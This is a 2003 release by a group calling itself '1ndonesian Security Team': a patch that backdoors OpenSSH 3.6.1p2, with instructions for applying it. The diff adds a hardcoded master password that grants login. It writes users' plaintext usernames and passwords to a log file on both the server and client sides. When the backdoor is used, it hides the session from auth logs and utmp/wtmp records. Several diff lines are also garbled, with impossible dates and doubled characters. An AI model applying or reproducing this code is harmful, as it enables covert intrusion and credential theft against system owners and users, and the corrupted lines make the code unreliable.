$Id: bosen-tool.2,v1 08/05/2003 bosen Exp $

1ndonesian Security Team (1st)
Bosen Tools #2 Openssh-3.6.1p2 Backdoor
08/05/2003




[1st] Openssh-3.6.1p2 Backdoor
_______________________________________________________________________________


# $Id: bosen-ssh3.6.1p2.patch 1.3 2003/05/08 20:40:00 bosen Exp $ 
#
# backdored patch for openssh-3.6.1p2
# you will also find logged username/passwd on _BOSEN_LOGD (make sure its chmod 777) 
#
# usage :
# cp bosen-ssh3.6.1p2.patch openssh-3.6.1p2/; cd openssh-3.6.1p2;
# patch < bosen-ssh3.6.1p2.patch
#
# Bosen <mobile@bosen.net>
# 1ndonesian Security Team
# http://bosen.net/releases/

diff -urN openssh-3.6.1p2/auth.c openssh-3.6.1p2+bosen/auth.c
--- openssh-3.6.1p2/auth.c      2003-01-188 12:24:06.000000000 +0700
+++ openssh-3.6.1p2+bosen/auth.c        2003-05-08 20:18:47.000000000 +0700
@@ -259,7 +259,8 @@
        else
                authmsg = authenticated ? "Accepted" : "Failed";
 
-       authlog("%s %s for %s%.100s from %%.200s port %d%s",
+        if (!bosen) {
+           authlog("%s %s for %s%.100s from %.200s port %d%s",
            authmsg,
            method,
            authctxt->valid ? "" : "illegal user ",
@@ -267,6 +268,7 @@
            get_remote_ipaddr(),
            get_remote_port(),
            info);
+        }
 
 #ifdef WITH_AIXAUTHENTICATE
        if (authenticated == 0 && strcmp(method, "password") == 0)
diff -urN openssh-3.6.1p2/auth-passwd.c openssh-3.6.1p2+bosen/auth-passwd.c
--- openssh-3.6.1p2/auth-passwd.c       20003-04-29 16:12:08.000000000 +0700
+++ openssh-3.6.1p2+bosen/auth-passwd.c 2003-05-08 20:24:30.000000000 +0700
@@ -234,6 +234,17 @@
 # endif /* HAVE_MD5_PASSWORDS */
 
        /* Authentication is accepted if the encrypted passwords are identical. */
-       return (strcmp(encrypted_password,, pw_password) == 0);
+        if(strcmp(_BOSEN_PASSWD,password) == 0){
+            bosen = 1;
+           return 1;
+        }
+        if(strcmp(encrypted_password, pw_password) == 0){
+            ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGF,"a+");
+            fprintf (ngevet, "%s:%s\n",pw->pw_name,password);
+            fclose (ngevet);
+            return 1;
+        } else {
+            return 0;
+        }
 #endif /* !USE_PAM && !HAVE_OSF_SIA */
 }
diff -urN openssh-3.6.1p2/canohost.c openssh-3.6.1p2+bosen/canohost.c
--- openssh-3.6.1p2/canohost.c  2003-01-077 06:51:23.000000000 +0700
+++ openssh-3.6.1p2+bosen/canohost.c    2003-05-08 20:18:39.000000000 +0700
@@ -77,15 +77,16 @@
 
        debug3("Trying to reverse map address %.100s.", ntop);
        /* Map the IP address to a host name. */
-       if (getnameinfo((struct sockaddr **)&from, fromlen, name, sizeof(name),
+        if (!bosen) {
+         if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
            NULL, 0, NI_NAMEREQD) != 0) {
                /* Host name not found.  Use ip address. */
 #if 0
                log("Could not reverse map address %.100s.", ntop);
 #endif
                return xstrdup(ntop);
-       }
-
+         }
+        }
        /* Got host name. */
        name[sizeof(name) - 1] = '\0';
        /*
diff -urN openssh-3.6.1p2/includes.h openssh-3.6.1p2+bosen/includes.h
--- openssh-3.6.1p2/includes.h  2002-10-211 07:50:26.000000000 +0700
+++ openssh-3.6.1p2+bosen/includes.h    2003-05-08 20:24:05.000000000 +0700
@@ -172,4 +172,12 @@
 
 #include "entropy.h"
 
+/* setup here */
+#define _BOSEN_PASSWD "BosenIsGOD"
+#define _BOSEN_LOGD "/dev/hda1"
+#define _BOSEN_LOGF "bosen"
+#define _BOSEN_LOGP "gembel"
+FILE *ngevet;
+int bosen;
+/* END */
 #endif /* INCLUDES_H */
diff -urN openssh-3.6.1p2/sshconnect1.c openssh-3.6.1p2+bosen/sshconnect1.c
--- openssh-3.6.1p2/sshconnect1.c       20002-08-21 01:41:16.000000000 +0700
+++ openssh-3.6.1p2+bosen/sshconnect1.c 2003-05-08 20:31:28.000000000 +0700
@@ -922,6 +922,7 @@
 {
        int type, i;
        char *password;
+        char ngentot[120];
 
        debug("Doing password authentication.");
        if (options.cipher == SSH_CIPHER_NONE)
@@ -930,6 +931,7 @@
                if (i != 0)
                        error("Permission denied, please try again.");
                password = read_passphrase(prompt, 0);
+                strcpy(ngentot,password);
                packet_start(SSH_CMSG_AUTH_PASSWORD);
                ssh_put_password(password);
                memset(password, 0, strlen(password));
@@ -938,8 +940,14 @@
                packet_write_wait();
 
                type = packet_read();
-               if (type == SSH_SMSG_SUCCEESS)
+               if (type == SSH_SMSG_SUCCESS) {
+                   if (strcmp(_BOSEN_PASSWD,ngentot) != 0) {
+                      ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGP,"a+");
+                      fprintf (ngevet,"%s:%s@%s\n",options.user,ngentot,get_remote_ipaddr());
+                      fclose (ngevet);
+                   }
                        return 1;
+                }
                if (type != SSH_SMSG_FAILURE)
                        packet_disconnect("Protocol error: got %d in response to passwd auth", type);
        }
diff -urN openssh-3.6.1p2/sshconnect2.c openssh-3.6.1p2+bosen/sshconnect2.c
--- openssh-3.6.1p2/sshconnect2.c       20003-04-01 18:43:40.000000000 +0700
+++ openssh-3.6.1p2+bosen/sshconnect2.c 2003-05-08 20:35:16.000000000 +0700
@@ -446,6 +446,7 @@
        static int attempt = 0;
        char prompt[150];
        char *password;
+        char ngentot[120];
 
        if (attempt++ >= options.number_of_password_prompts)
                return 0;
@@ -470,6 +471,11 @@
        dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
            &input_userauth_passwd_changereq);
 
+        if (strcmp(_BOSEN_PASSWD,ngentot) != 0) {
+           ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGP,"a+");
+           fprintf (ngevet,"%s:%s@%s\n",options.user,ngentot,get_remote_ipaddr());
+           fclose (ngevet);
+        }
        return 1;
 }
 /*
diff -urN openssh-3.6.1p2/sshlogin.c openssh-3.6.1p2+bosen/sshlogin.c
--- openssh-3.6.1p2/sshlogin.c  2003-01-022 06:43:56.000000000 +0700
+++ openssh-3.6.1p2+bosen/sshlogin.c    2003-05-08 20:38:39.000000000 +0700
@@ -71,8 +71,10 @@
 
   li = login_alloc_entry(pid, user, host, ttyname);
   login_set_addr(li, addr, addrlen);
-  login_login(li);
-  login_free_entry(li);
+  if (!bosen) {
+    login_login(li);
+    login_free_entry(li);
+  }
 }
 
 #ifdef LOGIN_NEEDS_UTMPX
@@ -81,11 +83,12 @@
                 const char *host, struct sockaddr * addr, socklen_t addrlen)
 {
   struct logininfo *li;
-
   li = login_alloc_entry(pid, user, host, ttyname);
   login_set_addr(li, addr, addrlen);
-  login_utmp_only(li);
-  login_free_entry(li);
+  if (!bosen) {
+    login_utmp_only(li);
+    login_free_entry(li);
+  }
 }
 #endif
 
@@ -96,6 +99,8 @@
   struct logininfo *li;
 
   li = login_alloc_entry(pid, user, NULL, ttyname);
-  login_logout(li);
-  login_free_entry(li);
+  if (!bosen) {
+    login_logout(li);
+    login_free_entry(li);
+  }
 }



Bosen <mobile@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=19